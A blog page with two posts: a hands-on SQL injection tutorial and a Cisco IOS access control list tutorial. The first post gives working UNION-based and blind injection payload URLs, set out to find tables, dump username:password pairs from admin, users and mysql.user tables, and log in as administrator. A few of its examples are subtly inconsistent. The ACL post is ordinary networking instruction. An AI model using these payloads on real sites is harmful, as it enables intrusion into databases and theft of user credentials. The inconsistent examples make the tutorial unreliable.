BERBAGILAH DALAM HAL KEBAIKAN TERMASUK ILMU WALAU CUMA SETITIK....

9/27/2014

SQL INJECTION TUTORIAL



Just want to share a little tutorial.

In this tutorial I will describe how sql injection works and how to
use it to get some useful information.
First of all: What is SQL injection?
Quote:It's one of the most common vulnerability in web applications today.
It allows attacker to execute database query in url and gain access
to some confidential information etc...(in shortly).
So let's start with some action
  1. Check for vulnerability
    Let's say that we have some site like this
Code:
http://www.site.com/news.php?id=5
Now to test if is vulrnable we add to the end of url ' (quote), and that would be
Code:
http://www.site.com/news.php?id=5'
so if we get some error like
"You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right etc..."
or something similar that means is vulrnable to sql injection
  1. Find the number of columns
    To find number of columns we use statement ORDER BY (tells database how to order the result)
    so how to use it? Well just incrementing the number until we get an error.
Quote:http://www.site.com/news.php?id=5 order by 1/* <-- no error
http://www.site.com/news.php?id=5 order by 2/* <-- no error
http://www.site.com/news.php?id=5 order by 3/* <-- no error
http://www.site.com/news.php?id=5 order by 4/* <-- error (we get message like this Unknown column '4' in 'order clause' or something like that)
that means that the it has 3 columns, cause we got an error on 4.
  1. Check for UNION function
    With union we can select more data in one sql statement.
    so we have
Code:
http://www.site.com/news.php?id=5 union all select 1,2,3/*
(we already found that number of columns are 3 in section 2).
if we see some numbers on screen, i.e 1 or 2 or 3 then the UNION works
  1. Check for MySQL version
Code:
http://www.site.com/news.php?id=5 union all select 1,2,3/*
if " /* " not working or you get some error, then try "--"
it's a comment and it's important for our query to work properly.
let say that we have number 2 on the screen, now to check for version
we replace the number 2 with @@version or version() and get someting like 4.1.33-log or 5.0.45 or similar.
it should look like this
Code:
http://www.site.com/news.php?id=5 union all select 1,@@version,3/*
if you get an error "union + illegal mix of collations (IMPLICIT + COERCIBLE) ..."
i didn't see any paper covering this problem, so i must write it
i.e
Code:
http://www.site.com/news.php?id=5 union all select 1,convert(@@version using latin1),3/*
or with hex() and unhex() i.e.
Code:
http://www.site.com/news.php?id=5 union all select 1,unhex(hex(@@version)),3/*
and you will get MySQL version
  1. Getting table and column name
    well if the MySQL version is < 5 (i.e 4.1.33, 4.1.12...) <--- later i will describe for MySQL > 5 version. we must guess table and column name in most cases.
    common table names are: user/s, admin/s, member/s ...
    common column names are: username, user, usr, user_name, password, pass, passwd, pwd etc...
    i.e would be
Code:
http://www.site.com/news.php?id=5 union all select 1,2,3 from admin/*
(we see number 2 on the screen like before, and that's good)
we know that table admin exists...
now to check column names.
Code:
http://www.site.com/news.php?id=5 union all select 1,username,3 from admin/*
(if you get an error, then try the other column name)
we get username displayed on screen, example would be admin, or superadmin etc...
now to check if column password exists
Code:
http://www.site.com/news.php?id=5 union all select 1,password,3 from admin/*
(if you get an error, then try the other column name)
we seen password on the screen in hash or plain-text, it depends of how the database is set up
i.e md5 hash, mysql hash, sha1...
now we must complete query to look nice
for that we can use concat() function (it joins strings)
i.e
Code:
http://www.site.com/news.php?id=5 union all select 1,concat(username,0x3a,password),3 from admin/*
Note that i put 0x3a, its hex value for : (so 0x3a is hex value for colon)
(there is another way for that, char(58), ascii value for : )
Code:
http://www.site.com/news.php?id=5 union all select 1,concat(username,char(58),password),3 from admin/*
now we get dislayed username:password on screen, i.e admin:admin or admin:somehash
when you have this, you can login like admin or some superuser
if can't guess the right table name, you can always try mysql.user (default)
it has user i password columns, so example would be
Code:
http://www.site.com/news.php?id=5 union all select 1,concat(user,0x3a,password),3 from mysql.user/*
  1. MySQL 5
    Like i said before i'm gonna explain how to get table and column names
    in MySQL > 5.
    For this we need information_schema. It holds all tables and columns in database.
    to get tables we use table_name and information_schema.tables.
    i.e
Code:
http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables/*
here we replace the our number 2 with table_name to get the first table from information_schema.tables
displayed on the screen. Now we must add LIMIT to the end of query to list out all tables.
i.e
Code:
http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 0,1/*
note that i put 0,1 (get 1 result starting from the 0th)
now to view the second table, we change limit 0,1 to limit 1,1
i.e.
Code:
http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 1,1/*
the second table is displayed.
for third table we put limit 2,1
i.e
Code:
http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 2,1/*
keep incrementing until you get some useful like db_admin, poll_user, auth, auth_user etc...
To get the column names the method is the same.
here we use column_name and information_schema.columns
the method is same as above so example would be
Code:
http://www.site.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns limit 0,1/*
the first column is displayed.
the second one (we change limit 0,1 to limit 1,1)
i.e.
Code:
http://www.site.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns limit 1,1/*
the second column is displayed, so keep incrementing until you get something like:
username,user,login, password, pass, passwd etc...
if you wanna display column names for specific table use this query. (where clause)
let's say that we found table users.
i.e.
Code:
http://www.site.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns where table_name='users'/*
now we get displayed column name in table users. Just using LIMIT we can list all columns in table users.
Note that this won't work if the magic quotes is ON.
let's say that we found colums user, pass and email.
now to complete query to put them all together
for that we use concat() , i decribe it earlier.
i.e
Code:
http://www.site.com/news.php?id=5 union all select 1,concat(user,0x3a,pass,0x3a,email) from users/*
what we get here is user:pass:email from table users.
example: admin:hash:whatever@blabla.com
That's all in this part, now we can proceed on harder part


Blind SQL Injection
Just want to share a little tutorial.

Blind injection is a little more complicated the classic injection but it can be done
I must mention, there is very good blind sql injection tutorial by xprog, so it's not bad to read it
Let's start with advanced stuff.
I will be using our example
Code:
http://www.site.com/news.php?id=5
hen we execute this, we see some page and articles on that page, pictures etc...
then when we want to test it for blind sql injection attack
Code:
http://www.site.com/news.php?id=5 and 1=1
this is always true
and the page loads normally, that's ok.
now the real test
Code:
http://www.site.com/news.php?id=5 and 1=2
this is false
so if some text, picture or some content is missing on returned page then that site is vulrnable to blind sql injection.
  1. Get the MySQL version
    to get the version in blind attack we use substring
    i.e
Code:
http://www.site.com/news.php?id=5 and substring(@@version,1,1)=4
this should return TRUE if the version of MySQL is 4.
replace 4 with 5, and if query return TRUE then the version is 5.
i.e
Code:
http://www.site.com/news.php?id=5 and substring(@@version,1,1)=5
  1. Test if subselect works
    when select don't work then we use subselect
    i.e
Code:
http://www.site.com/news.php?id=5 and (select 1)=1
if page loads normally then subselects work.
then we gonna see if we have access to mysql.user
i.e
Code:
http://www.site.com/news.php?id=5 and (select 1 from mysql.user limit 0,1)=1
if page loads normally we have access to mysql.user and then later we can pull some password usign load_file() function and OUTFILE.
  1. Check table and column names
    This is part when guessing is the best friend
    i.e.
Code:
http://www.site.com/news.php?id=5 and (select 1 from users limit 0,1)=1
(with limit 0,1 our query here returns 1 row of data, cause subselect returns only 1 row, this is very important.)
then if the page loads normally without content missing, the table users exits.
if you get FALSE (some article missing), just change table name until you guess the right one
let's say that we have found that table name is users, now what we need is column name.
the same as table name, we start guessing. Like i said before try the common names for columns.
i.e
Code:
http://www.site.com/news.php?id=5 and (select substring(concat(1,password),1,1) from users limit 0,1)=1
if the page loads normally we know that column name is password (if we get false then try common names or just guess)
here we merge 1 with the column password, then substring returns the first character (,1,1)
  1. Pull data from database
    we found table users i columns username password so we gonna pull characters from that.
Code:
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>80
ok this here pulls the first character from first user in table users.
substring here returns first character and 1 character in length. ascii() converts that 1 character into ascii value
and then compare it with simbol greater then > .
so if the ascii char greater then 80, the page loads normally. (TRUE)
we keep trying until we get false.
Code:
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>95
if we get TRUE, keep incrementing
Code:
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>98
if TRUE again, higher
Code:
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>99
FALSE!!!
so the first character in username is char(99). Using the ascii converter we know that char(99) is letter 'c'.
then let's check the second character.
Code:
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>99
Note that i'm changed ,1,1 to ,2,1 to get the second character. (now it returns the second character, 1 character in lenght)
Code:
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>99
TRUE, the page loads normally, higher.
Code:
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>107
FALSE, lower number.
Code:
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>104
TRUE, higher.
Code:
ttp://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>105
FALSE!!!
we know that the second character is char(105) and that is 'i'. We have 'ci' so far
so keep incrementing until you get the end. (when >0 returns false we know that we have reach the end).

There are some tools for Blind SQL Injection, i think sqlmap is the best, but i'm doing everything manually, cause that makes you better SQL INJECTOR
Hope you learned something from this thread.

Share

9/24/2014

IP Access Control List Security

                         
Network security is one of the hottest topics in networking today. Cisco routers and switches can be used as part of a good overall security strategy. The most important tool in Cisco IOS software used as part of that strategy is Access Control Lists (ACLs). ACLs define rules that can be used to prevent some packets from flowing through the network.

Standard IP Access Control Lists
ACLs cause a router to discard some packets based on criteria defined by the network engineer. The goal of these filters is to prevent unwanted traffic in the network—where to prevent hackers or just to prevent employees from using systems that should not be using and so on.  
           
This chapter covers two main categories of IOS IP ACLs, standard and extended. Standard ACLs use simpler logic, and extended ACLs use more-complex logic.    
     
ACLs may also be used for purposes other than filtering IP traffic. For example, defining traffic to Network Address Translate (NAT) or encrypt, or filtering non-IP protocols such as AppleTalk or IPX.
  
IP Standard ACL Concept 
As soon as you know what needs to be filtered, the next step is to decide where to filter the traffic. Cisco IOC software applies the filtering logic of an ACL either as a packet enters an interface or as it exist the interface. After you have chosen the router on which you want to place the access list you must choose the interface on which to apply the access logic, as well as whether to apply the logic for inbound (traveling towards a place rather than leaving it.) or outbound packets.
           
Look at the following image:
                                                           
                                                                        Router

Here are some key features of access lists:

·         Packets can be filtered as they enter an interface, before the routing decision.
·         Packets can be filtered before they exit an interface, after the routing decision.
·         Deny is the term used in IOS to imply that the packet will be filtered.
·         Permit is the term used in IOS to imply that the packet will not be filtered.
·         At the end of every access list is an implied “deny all traffic” statement. Therefore, if a packet not matches any of your access list statement, it is blocked. These two ACLs (101 and 102) have the same effect:
 
               access-list 101 permit ip 10.1.1.0 0.0.0.255 172.16.1.0 0.0.0.255
               access-list 102 permit ip 10.1.1.0 0.0.0.255 172.16.1.0 0.0.0.255 
               access-list 102 deny ip any any 

·         When you refer to a router, these terms have these meanings:
Out - Traffic that has already been through the router and is leaving the interface. The source is where it has been (on the other side of the router) and the destination is where it goes.
In - Traffic that arrives on the interface and then goes through the router. The source is where it has been and the destination is where it goes (on the other side of the router).
Access list have two major steps in their logic: matching and acting. Matching logic examines each packet and determines whether it matches the access-list statement. ACLs tell the router to take one of two actions when a statement is matched: deny or permit. When an access list has multiple entries, IOS searches the list sequentially (following in order) until the first statement is matched. The matched statement determines the action to be taken.
           
Note: Because the switch stops testing conditions after the first match, the order of the conditions is critical. 
           
Wildcard Masks
Regardless of whether you use standard or extended IP ACLs, you can tell the router to match based on the entire IP address or just a part of the IP address.

Cisco wildcard masks define the portion of the IP address that should be examined. For example, suppose that one mask implies that the whole packet should be checked and another implies that the only three octets of the address need to be examined.

Wildcard masks look similar to subnet mask, but they are not the same. The Wildcard mask’s 0 bits tell the router that those corresponding bits in the address must be compared when performing matching logic. The binary 1s in the Wildcard mask tell the router that those bits do not need to be compared.

Note: Unlike subnet masks, which require contiguous bits indicating network and subnet to be ones, wildcard masks allow noncontiguous bits in the mask.
           
The following table lists some of the more popular Wildcard masks, along with their meanings:


 
Standard IP Access List Configuration
Standard IP access lists can examine only the source IP address. Look at the following examples:

        
The number you use to denote your ACL shows the type of access list that you are creating. Standard IP access lists use a number in the range of 1 to 99 or 1300 to 1999. There is no difference in using one number or another, as long as it is in the correct range. In other words, list 1 is no better or worse than list 99. The access-list commands, under which the matching and action logic are defined, are global configuration commands. To enable the ACL on an interface and define the direction of packets to which the ACL is applied, the ip access-group command is used.
The wildcard mask of  0.0.0.0. means “match all 32 bits”, so only packets whose IP address exactly matches 172.16.3.10 match this statement and are discarded. The access-list permit 0.0.0.0 255.255.255.255 command, matches all packets.

Example 2

Cisco IOS allows both an older style and newer style of configuration for some parameters. The Figure 1 shows the older style and the router changes to the equivalent newer-style configuration in Figure 2. First, the use of a wildcard mask of 0.0.0.0 does indeed mean that the router should match that specific, host IP address. The newer style configuration uses the host keyword in front of the specific IP address. The other change to the newer style configuration involves the use of wildcard mask 255.255.255.255. The newer style configuration uses the keyword any to replace wildcard mask 255.255.255.255.

The following example shows how to create a standard ACL to deny access to IP host 172.16.20.1.


Editing an ACL requires special attention. For example, if you intend to delete a specific line from an existing numbered ACL as shown here, the entire ACL is deleted.

router#configure terminal
        Enter configuration commands, one per line.  End with CNTL/Z.
        router(config)#access-list 101 deny icmp any any
        router(config)#access-list 101 permit ip any any
        router(config)#^Z
  
  router#show access-list
        Extended IP access list 101
        deny icmp any any
        permit ip any any
  router#
        *Mar  9 00:43:12.784: %SYS-5-CONFIG_I: Configured from console by console
 
        router#configure terminal
               Enter configuration commands, one per line.  End with CNTL/Z.
               router(config)#no access-list 101 deny icmp any any
               router(config)#^Z
  
        router#show access-list
        router#
        *Mar  9 00:43:29.832: %SYS-5-CONFIG_I: Configured from console by console

To edit numbered ACLs, copy the configuration of the router to a TFTP server or a text editor such as Notepad. Then make any changes and copy the configuration back to the router.

Standard IP ACL: Example

The second standard IP ACL exposes more ACL issues. Figure 1 and Example 3 and 4 show a basic use of standard IP access lists, with two oversights in the first attempt. The criteria for the access list are as follows:

·         Sam is not allowed access to Buge or Daffy.
·         Hosts on the Seville Ethernet are not allowed access to hosts on the Yosemite Ethernet.
·         All other combinations are allowed.



At first glance, these two access lists seem to perform the desired function. However, when one of the WAV links fails, some holes can appear in the ACLs. For example, if the link from Albuquerque to Yosemite fails, Yosemite learns a route to 10.1.1.0/24 through Seville. Packets from Sam, forward by Yosemite and leave Yosemite’s serial 1 interface without being filtered. So criterion 1 is no longer met. Similarly, if the link from Albuquerque to Yosemite fails, Seville routes packets through Albuquerque, so criterion 2 is no longer met.

Example 5 illustrates an alternative solution –one that works even when some of the links fail.


Extended IP Access Control Lists

Extended ACLs were introduced in Cisco IOS Software Release 8.3. Extended IP access lists have both similarities and differences compared to standard IP ACLs. Just like standard lists, you enable extended lists on interfaces for packets either entering or exiting the interface. IOS searches the list sequentially and so on.

The one key difference between the two is the variety of fields in the packets that can be compared for matching by extended access lists. A single ACL statement can examine multiple parts of the packet header, requiring that all the parameters be matched correctly in order to match that one ACL statement.

When creating ACEs in numbered extended access lists, remember that after you create the list, any additions are placed at the end of the list. You cannot reorder the list or selectively add or remove ACEs from a numbered list. Look at the following example:
router#configure terminal
          Enter configuration commands, one per line.  
          router(config)#ip access-list extended test
          router(config-ext-nacl)#permit ip host 2.2.2.2 host 3.3.3.3
          router(config-ext-nacl)#permit tcp host 1.1.1.1 host 5.5.5.5 eq www
          router(config-ext-nacl)#permit icmp any any
          router(config-ext-nacl)#permit udp host 6.6.6.6 10.10.10.0 0.0.0.255 
eq domain
               router(config-ext-nacl)#^Z
        1d00h: %SYS-5-CONFIG_I: Configured from console by consoles-l
 
        router#show access-list
               Extended IP access list test
                       permit ip host 2.2.2.2 host 3.3.3.3
                       permit tcp host 1.1.1.1 host 5.5.5.5 eq www
                       permit icmp any any
                       permit udp host 6.6.6.6 10.10.10.0 0.0.0.255 eq domain
  
        router#configure terminal
        Enter configuration commands, one per line.  End with CNTL/Z.
        router(config)#ip access-list extended test
   
        !--- ACL entry deleted.
 
        router(config-ext-nacl)#no permit icmp any any
           
        !--- ACL entry added.
 
        router(config-ext-nacl)#permit gre host 4.4.4.4 host 8.8.8.8
        router(config-ext-nacl)#^Z
        1d00h: %SYS-5-CONFIG_I: Configured from console by consoles-l
   
        router#show access-list
               Extended IP access list test
                       permit ip host 2.2.2.2 host 3.3.3.3
                       permit tcp host 1.1.1.1 host 5.5.5.5 eq www
                       permit udp host 6.6.6.6 10.10.10.0 0.0.0.255 eq domain
                       permit gre host 4.4.4.4 host 8.8.8.8
Any deletions are removed from the ACL and any additions are made to the end of the ACL.
The following table summarizes the different fields that can be matched with an extended IP ACL, as compared with standard IP ACL.


IOS checks all the matching information configured in a single access-list command. Everything must match for that single command to consider a match and for the defined action to be taken.


Note: To match any Internet protocol (including TCP and UDP), use the keyword ip.
  
Extended IP ACL Configuration


Note: Use the no access-list access-list-number global configuration command to delete the entire ACL.

The following example focuses on understanding the basic syntax.


There are several new items to review. First, the access list number for extended access lists falls in the range of 100 to 199 or 2000 to 2699. Following the permit and deny action, the protocol parameter defines whether you want to check for all IP packets or just those with TCP or UDP headers. When you check for TCP or UDP port number, you must specify the TCP or UDP protocol.

The eq parameter means “equal”. It implies that you are checking the port numbers—in this case, the destination port number. You can use the numeric values or for the more popular options, a text is valid. If you were to enter eq 80, the config would show eq http.

With extended IP ACLs, Cisco suggests that you locate them as close to the source of the packet as possible.

In addition to defining ACL source and destination, it is possible to define ports, ICMP message types, and other parameters. A good source of information for well-known ports is RFC 1700.

The router can display descriptive text on some of the well-known ports. Use a ? for help.
                  access-list 102 permit tcp host 10.1.1.1 host 172.16.1.1 eq ?
                       bgp          Border Gateway Protocol (179)
                       chargen      Character generator (19)
                       cmd          Remote commands (rcmd, 514)

During configuration, the router also converts numeric values to more user-friendly values. This is an example where typing the ICMP message type number causes the router to convert the number to a name.
               access-list 102 permit icmp host 10.1.1.1 host 172.16.1.1 14
becomes
               access-list 102 permit icmp host 10.1.1.1 host 172.16.1.1 
               timestamp-reply

The following example shows how to create and display an extended access list to deny Telnet access from any host in network 171.69.198.0 to any host in network 172.20.52.0 and permit any others:


In this example, the last entry is sufficient. You do not need the first three entries because TCP includes Telnet, and IP includes TCP, User Datagram Protocol (UDP), and Internet Control Message Protocol (ICMP).
               access-list 101 permit tcp host 10.1.1.2 host 172.16.1.1 eq telnet 
               access-list 101 permit tcp host 10.1.1.2 host 172.16.1.1
               access-list 101 permit udp host 10.1.1.2 host 172.16.1.1
               access-list 101 permit ip 10.1.1.0 0.0.0.255 172.16.1.0 0.0.0.255 




Named IP Access Lists 


You can identify IP ACLs with an alphanumeric string (a name) rather than a number. If you identify your access list with a name rather than a number, the mode and command syntax are slightly different. However, not all commands that use IP access lists accept a named ACL.

The name you give to a standard ACL or extended ACL can also be a number in the supported range of access list numbers. That is, the name of a standard IP ACL can be 1 to 99; the name of an extended IP
ACL can be 100 to 199.

Named ACLs have another key featured that numbered ACLs do not: you can delete individual lines in a named IP access list. With named ACLs, you can enter a command that removes individual lines in an ACL.

Consider these guidelines and limitations before configuring named ACLs:

• A standard ACL and an extended ACL cannot have the same name.
• Numbered ACLs are also available,
           




After you create an ACL, any additions are placed at the end of the list. You cannot selectively add ACEs to a specific ACL. However, you can use no permit and no deny commands to remove ACEs from a named ACL. This example shows how you can delete individual ACEs from a named ACL:


The following example shows the named IP ACL.


The above example begins with the creation of an ACL named Barney. The ip access-list extended barney command creates the ACL, naming it barney and place the user in ACL configuration mode. This command also tells the IOS that barney is an extended ACL. The permit and deny commands use the exact same syntax that the numbered access-list commands use.

ipThe show-config command output lists the named ACL configuration before the single entry is deleted. Next, the no deny ip… command deletes a single entry from the ACL.

The ACL does not actually filter any packets. It would need to be enabled on an interface first. For instance, the ip access-group out interface subcommand would enable the ACL.

Including Comments about Entries in ACLs

You can use the remark command to include comments (remarks) about entries in any IP standard or extended ACL. The remarks make the ACL easier for you to understand and scan. Each remark line is limited to 100 characters.

The remark can go before or after a permit or deny statement. You should be consistent about where you put the remark so that it is clear which remark describes which permit or deny statement. For example, it would be confusing to have some remarks before the associated permit or deny statements and some remarks after the associated statements.

For IP numbered standard or extended ACLs, use the access-list access-list number remark remark global configuration command to include a comment about an access list. To remove the remark, use the no form of this command.

In this example, the workstation belonging to Jones is allowed access, and the workstation belonging to
Smith is not allowed access:

For an entry in a named IP ACL, use the remark access-list global configuration command. To remove the remark, use the no form of this command.

In this example, the Jones subnet is not allowed to use outbound Telnet:



Applying ACLs to a Physical Interface


            The following example shows how to apply access list 2 on Gigabit Ethernet interface 0/2 to filter packets interning the interface:


Controlling Telnet Access with ACLs
         
Accessing into and out of the virtual terminal line (vty) ports can be controlled by IP access lists. You can use ACLs to limit the IP hosts that can Telnet into the router or the switch, and you can also limit the hosts to which a user of the router or the switch cans Telnet.

For example, imagine that only just in subnet 10.1.1.0/24 are supposed to be able to Telnet into any of the Cisco routers or switches in a network. In such a case, the following configuration could be used on each router or switch to deny access from IP addresses not in that subnet.


Note: When controlling access to a line, you must use a number and also you must use the access-class access-list-number {in | out} command.

The access-class command refers to the matching logic in access-list 3. The keyword in refers to Telnet connection into this router. As configured, ACL 3 checks the source IP address of packet for incoming Telnet connection.  


ACL Implementation Considerations

            Cisco makes following general recommendations about ACLs:

·         Create your ACLs using a text editor outside the router, and copy and paste the configuration into the router. That way, if you mistakes when typing, you can fix them in the editor. With numbered ACLs, to delete a single line, you have to delete the whole ACL and reenter all the commands in order. Or you might later want to add a line to it … Another reason to configure an access list before applying it is because if you applied a nonexistent access list to an interface and then proceed to configure the access list, the first statement is put into effect, and the implicit deny statement that follows could cause you immediate access problems.

·         Place extended ACLs as close to the source of the packet as possible to discard the packets quickly. If you are going to filter a packet filtering closer to the packet’s source means that the packet takes up less bandwidth in the network, which seems to be more efficient.

·         Place standard ACLs as close to the packet’s destination as possible, because standard ACLs often discard packets that you do not want discard when they are placed close to the source. For instance, imagine that Fred and Barney are separated by four routers. If you filter Barney’s traffic sent to Fred router, Barney can’t reach any hosts near the other routers.

·         Place more-specific statements early in the ACL. By placing more-specific matching parameters early in the list, you are less likely to make mistakes in the ACL. For example, imagine that you have a statement that permits all traffic from 10.1.1.1 to 10.2.2.2, destined, for port 80, and another statement that denied all other packets sourced in subnet 10.1.10/24. Both statements would match packets sent by host 10.1.1.1 to a web server at 10.2.2.2, but you probably meant to match the more-specific statement first.  

·         Disable an ACL from its interface (using the no ip access-group command) before making changes to it. If you have an IP ACL enabled on an interface and you delete the entire ACL, IOS does not filter any packets. Even so, as soon as you add a command to the ACL, the IOS starts filtering packets. If you want to enter a long ACL, you might temporarily filter packets you don’t want to filter! Therefore, the better way is to disable the list from the interface, make the changes to the list, and then reenable it on the interface.

·         Because the software stops testing conditions after it encounters the first match (to either a permit or deny statement), you will reduce processing time and resources if you put the statements that packets are most likely to match at the beginning of the access list. Place more frequently occurring conditions before less frequent conditions.

·         In order to make the purpose of individual statements more easily understood at a glance, you can write a helpful remark before or after any statement.   

Troubleshoot

How do I remove an ACL from an interface?

To remove an ACL from an interface, go into configuration mode and enter no in front of the access-group command, as shown in this example.
               interface <interface> 
               no ip access-group # in|out


If too much traffic is denied, study the logic of your list or try to define and apply an additional broader list. The show ip access-lists command provides a packet count that shows which ACL entry is being hit. 



Share